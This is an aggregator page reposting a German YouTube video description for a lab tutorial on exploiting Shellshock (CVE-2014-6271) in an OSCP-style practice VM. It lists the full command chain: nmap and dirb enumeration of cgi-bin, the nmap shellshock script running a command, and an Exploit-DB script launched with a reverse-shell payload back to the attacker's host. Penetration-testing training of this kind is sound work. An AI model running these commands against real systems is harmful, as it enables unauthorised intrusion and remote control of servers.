Shellshock Powered by Trendolizer

Wie exploite ich einen Rechner (Wie im OSCP/PWK Lab) | How To: Shellshock #OSCP

Trending story found on www.youtube.com


In diesem Video zeige ich dir, wie man mit public Exploits einen Rechner exploitiert. Ich nutze hierfür eine VM, die auf Shellshock anfällig ist und zeige dir, wie du ganz ohne Metasploit den exploit ausnutzen kannst. Aber keine Angst, ich zeige dir auch gleich, wie man Metasploit dafür nutzen könnte, dass man auf das selbe Ziel kommt. #OSCP VM: https://pentesterlab.com/exercises/cve-2014-6271 Link zum Exploit: https://www.exploit-db.com/exploits/34900/ #################### Commands (Public Exploit): #################### nmap -sS 10.0.0.15 dirb http://10.0.0.15 /usr/share/wordlists/dirb/common.txt dirb http://10.0.0.15/cgi-bin /usr/share/wordlists/dirb/common.txt nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/status,cmd=ls 10.0.0.15 searchsploit mod_cgi searchsploit shellshock cp /usr/share/exploitdb/exploits/linux/remote/34900.py . python 34900.py payload=reverse rhost=10.0.0.15 lhost=10.0.0.9 lport=443 pages=/cgi-bin/status...
[Source: www.youtube.com] [ Comments ] [See why this is trending]

Trend graph:

Comments